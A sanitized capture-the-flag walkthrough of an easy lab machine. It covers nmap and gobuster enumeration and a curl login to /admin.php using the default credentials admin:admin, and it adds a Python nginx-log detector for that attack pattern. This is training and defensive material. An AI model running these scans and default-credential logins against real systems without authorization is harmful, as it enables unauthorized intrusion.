Walkthrough — <TARGET> (Easy / Starting Point)

Linux box running nginx 1.14.2 with a PHP admin login page at /admin.php. Default credentials admin:admin yield the flag immediately. No shell access or privilege escalation required -- this is a single-flag Starting Point machine. Result: Port 80/tcp open...

Easy · Published 2026-06-11 · Sanitized local writeup

Objective

Machine walkthrough focused on evidence, validation, and reusable operator lessons.

Walkthrough flow

  1. Open services: HTTP 80 (nginx 1.14.2)
  2. Findings: /admin.php login form (POST, fields:...
  3. Most likely path: Default credentials (admin:admin)
  4. Backup path: Brute force, SQL injection on login form
  5. nmap -sC -sV -> port 80 open (nginx 1.14.2)

Source coverage

Moderate source coverage

Status: partial. This article is generated from 2 sanitized Markdown sources and keeps raw flags, credentials, keys, cookies, and reusable secrets out of the rendered blog.

57% coverage

Evidence verdict

Moderate confidence: the page is useful for review, but it should be treated as partial because the available source material is thinner or less narrative-complete.

  • <TARGET>-Preignition/walkthrough.md
  • HTB/<TARGET>-Preignition/notes.md

Technical Walkthrough

Summary

Linux box running nginx 1.14.2 with a PHP admin login page at /admin.php. Default credentials admin:admin yield the flag immediately. No shell access or privilege escalation required -- this is a single-flag Starting Point machine.

Enumeration

Port Scan

bash
nmap -sC -sV -oN nmap/initial <TARGET>

Result: Port 80/tcp open (nginx 1.14.2, default welcome page). Port 3690 filtered (SVN, inaccessible).

Full TCP Scan

bash
nmap -p<redacted> --min-rate 5000 -oN nmap/allports <TARGET>

Result: Confirmed only port 80 is open. All other ports filtered (transient/firewall).

Web Enumeration

bash
gobuster dir -u http://<TARGET>/ -w /usr/share/wordlists/dirb/common.txt -t 30

Result: /admin.php (Status 200, Size 999)

Quick Win Checks

  • robots.txt: 404
  • .git/HEAD: 404
  • sitemap.xml: 404

Admin Page Analysis

bash
curl -s http://<TARGET>/admin.php

Simple login form: POST to self, fields username and password. No CSRF token, no JavaScript validation. Uses W3.CSS styling.

Exploitation

Default Credentials

bash
curl -s -d 'username=admin&password=<redacted>' http://<TARGET>/admin.php

Result: Immediate success.

Flag: <hash redacted>

Lessons Learned

  1. Always try default credentials first on Easy/Starting Point boxes before anything else.
  2. admin:admin is the most common default credential pair in CTF contexts.
  3. The only real enumeration needed was finding the /admin.php endpoint via directory fuzzing.
  4. Total solve time: approximately 3 minutes from first scan to flag.
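
Seen from the web server's side, the path in this walkthrough leaves a recognizable trace in the nginx access log: a burst of 404s from directory fuzzing, then a POST to /admin.php from the same address. The detection below is an added example, not part of the original writeup; it assumes nginx's default combined log format, and the thresholds, IP addresses, response sizes and log lines are constructed for illustration.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# nginx default "combined" log format (assumption; adjust to your log_format).
LINE = re.compile(r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
                  r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\d+)')
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"

def detect(lines, min_404=20, window=timedelta(seconds=60), login_paths=("/admin.php",)):
    """Alert when an IP POSTs to a login path within `window` of a 404 burst."""
    misses = defaultdict(list)   # ip -> timestamps of its 404 responses
    alerts = []
    for raw in lines:
        m = LINE.match(raw)
        if not m:
            continue             # skip lines that are not in combined format
        try:
            ts = datetime.strptime(m["ts"], TS_FMT)
        except ValueError:
            continue             # skip lines with an unparseable timestamp
        ip, path = m["ip"], m["path"].split("?")[0]
        if m["status"] == "404":
            misses[ip].append(ts)
        elif m["method"] == "POST" and path in login_paths:
            recent = [t for t in misses[ip] if timedelta(0) <= ts - t <= window]
            if len(recent) >= min_404:
                # The form posts to itself and answers 200 either way, so report
                # the body size for triage instead of inferring success from status.
                alerts.append({"ip": ip, "path": path, "time": ts.isoformat(),
                               "burst_404": len(recent), "resp_bytes": int(m["size"])})
    return alerts

def sample_log():
    """Constructed sample: one client fuzzes and then logs in; another only logs in."""
    t0 = datetime.strptime("05/May/2026:10:00:00 +0000", TS_FMT)
    def row(ip, sec, req, st, sz, ua):
        ts = (t0 + timedelta(seconds=sec)).strftime(TS_FMT)
        return f'{ip} - - [{ts}] "{req} HTTP/1.1" {st} {sz} "-" "{ua}"'
    rows = [row("10.0.0.5", i // 10, f"GET /word{i}", 404, 153, "gobuster/3.6") for i in range(40)]
    rows.append(row("10.0.0.5", 5, "GET /admin.php", 200, 999, "gobuster/3.6"))
    rows.append(row("10.0.0.5", 30, "POST /admin.php", 200, 1204, "curl/8.5.0"))
    rows.append(row("10.0.0.9", 31, "GET /", 200, 612, "Mozilla/5.0"))
    rows.append(row("10.0.0.9", 32, "POST /admin.php", 200, 1010, "Mozilla/5.0"))
    return rows

if __name__ == "__main__":
    for alert in detect(sample_log()):
        print(alert)
```

Because /admin.php returns 200 for both the form and the login response, compare `resp_bytes` against the 999-byte form page during triage.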

Artifacts

  • nmap/initial — Initial service scan
  • nmap/allports — Full TCP port scan
  • enum/gobuster.txt — Directory fuzzing results
  • loot/flag.txt — Captured flag
  • loot/admin-response.html — Full HTTP response containing the flag

Source-Backed Dossier

The sections below are merged from companion Markdown notes for the same case. They are rendered after sanitization so the article stays precise without publishing raw flags, credentials, or target-specific secrets.

Notes

Scope

  • Target: <TARGET> (Linux, Easy / Starting Point)
  • Attacker VPN IP: <TARGET>
  • Pwnbox: x08@<TARGET>
  • Date: 2026-05-05
  • Timebox: 45-60 min target
  • Solve time: ~3 minutes

Phase 0 — Setup

  • [x] Workspace created
  • [x] Pwnbox SSH verified
  • [x] Target reachable (ping OK, TTL 63 -> Linux)

Phase 1 — Recon

  • Port 80/tcp open — nginx 1.14.2 (default welcome page)
  • Port 3690/tcp filtered — SVN (not accessible)
  • Full port scan: only port 80 truly open, all others filtered/noise
  • No robots.txt, .git, or sitemap

Directory Fuzzing

  • /admin.php (200, 999 bytes) — login form with username/password fields

Phase 2 — Research

  • Not needed. Default creds first on Easy box.

Phase 3 — Synthesis

  1. Open services: HTTP 80 (nginx 1.14.2)
  2. Findings: /admin.php login form (POST, fields: username, password)
  3. Most likely path: Default credentials (admin:admin)
  4. Backup path: Brute force, SQL injection on login form

Phase 4 — Foothold / Flag

  • admin:admin returned the flag on first attempt
  • Flag: <hash redacted>

Phase 5 — Privesc

  • Not applicable (Starting Point — single flag)

Command Log

text
nmap -sC -sV <TARGET>         -> port 80 open (nginx 1.14.2)
nmap -p<redacted> --min-rate 5000            -> confirmed only port 80 truly open
gobuster dir -w common.txt          -> /admin.php found
curl -d 'username=admin&password=<redacted>' http://<TARGET>/admin.php -> FLAG